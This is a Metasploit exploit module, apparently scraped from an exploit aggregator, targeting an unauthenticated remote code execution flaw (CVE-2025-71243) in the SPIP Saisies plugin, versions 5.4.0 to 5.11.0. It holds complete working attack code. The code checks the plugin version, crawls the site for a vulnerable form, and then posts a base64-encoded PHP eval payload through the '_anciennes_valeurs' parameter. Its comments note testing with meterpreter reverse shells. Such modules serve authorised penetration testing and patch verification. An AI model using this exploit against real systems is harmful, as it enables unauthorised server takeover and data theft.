## https://sploitus.com/exploit?id=PACKETSTORM:216938
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Payload::Php
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Spip
prepend Msf::Exploit::Remote::AutoCheck
FORM_PARAM = '_anciennes_valeurs'.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SPIP Saisies Plugin Unauthenticated RCE',
'Description' => %q{
This module exploits an unauthenticated PHP code injection in the SPIP
Saisies plugin (CVE-2025-71243). The _anciennes_valeurs form parameter is
interpolated unsanitized into a hidden field rendered with
interdire_scripts=false, allowing direct PHP code execution via template
eval.
Exploitation requires a publicly accessible page containing a
saisies-powered form, most commonly created with the Formidable plugin.
Use the FORM_PAGE option to specify a known form page, or set it to
'crawl' to automatically discover one by following internal links from
the SPIP sitemap.
Versions 5.4.0 through 5.11.0 of the saisies plugin are affected.
},
'Author' => [
'OpenStudio', # Discovery
'Valentin Lobstein <chocapikk[at]leakix.net>' # PoC and Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-71243'],
['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-pour-le-plugin-Saisies.html'],
['URL', 'https://plugins.spip.net/saisies']
],
'Targets' => [
[
'PHP In-Memory', {
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell', {
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell', {
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => '2025-02-19',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('FORM_PAGE', [
true,
'Page containing a saisies form (e.g. "contact"), or "crawl" to auto-discover',
'crawl'
]),
OptInt.new('CRAWL_MAX_PAGES', [true, 'Maximum pages to visit when crawling', 100])
])
end
def check
version = spip_plugin_version('saisies')
if version
print_status("Saisies plugin version: #{version}")
if version.between?(Rex::Version.new('5.4.0'), Rex::Version.new('5.11.0'))
return CheckCode::Appears("Saisies plugin #{version} is in the vulnerable range (5.4.0 - 5.11.0).")
end
return CheckCode::Safe("Saisies plugin #{version} is not in the vulnerable range.")
end
spip_ver = spip_version
return CheckCode::Unknown('Target does not appear to be running SPIP.') unless spip_ver
CheckCode::Detected("SPIP #{spip_ver} detected but could not determine saisies plugin version.")
end
# Find a page containing a saisies form (_anciennes_valeurs parameter).
# When FORM_PAGE is set to a specific page name, only that page is checked.
# When set to 'crawl', the module fetches the SPIP sitemap and follows
# internal links until a form is found or CRAWL_MAX_PAGES is reached.
def find_form_page
if datastore['FORM_PAGE'].downcase != 'crawl'
page = datastore['FORM_PAGE']
if page.start_with?('/')
return page if saisies_form?(page)
fail_with(Failure::NotFound, "No saisies form found at #{page}")
end
uri = normalize_uri(target_uri.path, 'spip.php')
full_uri = "#{uri}?page=#{page}"
return full_uri if saisies_form?(uri, 'page' => page)
fail_with(Failure::NotFound, "No saisies form found at #{full_uri}")
end
crawl_for_form
end
def saisies_form?(uri, vars_get = {})
res = send_request_cgi('method' => 'GET', 'uri' => uri, 'vars_get' => vars_get)
res&.code == 200 && res.body.include?(FORM_PARAM)
end
def crawl_for_form
max_pages = datastore['CRAWL_MAX_PAGES']
seen = Set.new
queue = []
# Seed with the SPIP sitemap page
plan_path = normalize_uri(target_uri.path, 'spip.php')
plan_uri = "#{plan_path}?page=plan"
res = send_request_cgi('method' => 'GET', 'uri' => plan_path, 'vars_get' => { 'page' => 'plan' })
if res&.code == 200
seen.add(plan_uri)
extract_internal_links(res).each { |link| queue << link }
end
# Also seed with the base URL
base_uri = normalize_uri(target_uri.path, 'spip.php')
queue << base_uri unless seen.include?(base_uri)
print_status("Crawling for saisies forms (max #{max_pages} pages)...")
until queue.empty? || seen.size >= max_pages
uri = queue.shift
next if seen.include?(uri)
seen.add(uri)
vprint_status("Checking #{uri}")
begin
res = send_request_cgi('method' => 'GET', 'uri' => uri)
rescue ::Rex::ConnectionError
next
end
next unless res&.code == 200
if res.body.include?(FORM_PARAM)
print_good("Form found at #{uri} (checked #{seen.size} pages)")
return uri
end
extract_internal_links(res).each do |link|
queue << link unless seen.include?(link)
end
end
fail_with(Failure::NotFound, "No saisies form found after crawling #{seen.size} pages.")
end
# Extract internal links from an HTML response, filtering out static assets.
def extract_internal_links(res)
links = []
doc = res.get_html_document
return links unless doc
doc.css('a[href]').each do |a|
href = a['href'].to_s.strip
next if href.match?(/\.(?:css|js|png|jpe?g|gif|svg|ico|woff2?|xml|pdf|zip|gz)(?:\?|$)/i)
# Resolve protocol-relative URLs (//example.com/page)
if href.start_with?('//')
href = "#{ssl ? 'https' : 'http'}:#{href}"
end
# Resolve absolute URLs to paths
if href.start_with?('http://', 'https://')
uri = begin
URI.parse(href)
rescue StandardError
next
end
target = begin
URI.parse(full_uri)
rescue StandardError
next
end
next unless uri.host == target.host
href = uri.path
href += "?#{uri.query}" if uri.query
elsif !href.start_with?('/')
href = normalize_uri(target_uri.path, href)
end
links << href
end
links.uniq
end
def exploit
form_uri = find_form_page
print_status('Sending payload...')
phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
b64 = Rex::Text.encode_base64(phped_payload)
tag = Rex::Text.rand_text_alpha(8)
injection = "#{tag}' /><?php eval(base64_decode('#{b64}')); ?><input value='#{tag}"
send_request_cgi({
'method' => 'POST',
'uri' => form_uri,
'vars_post' => {
FORM_PARAM => injection
}
}, 5)
end
end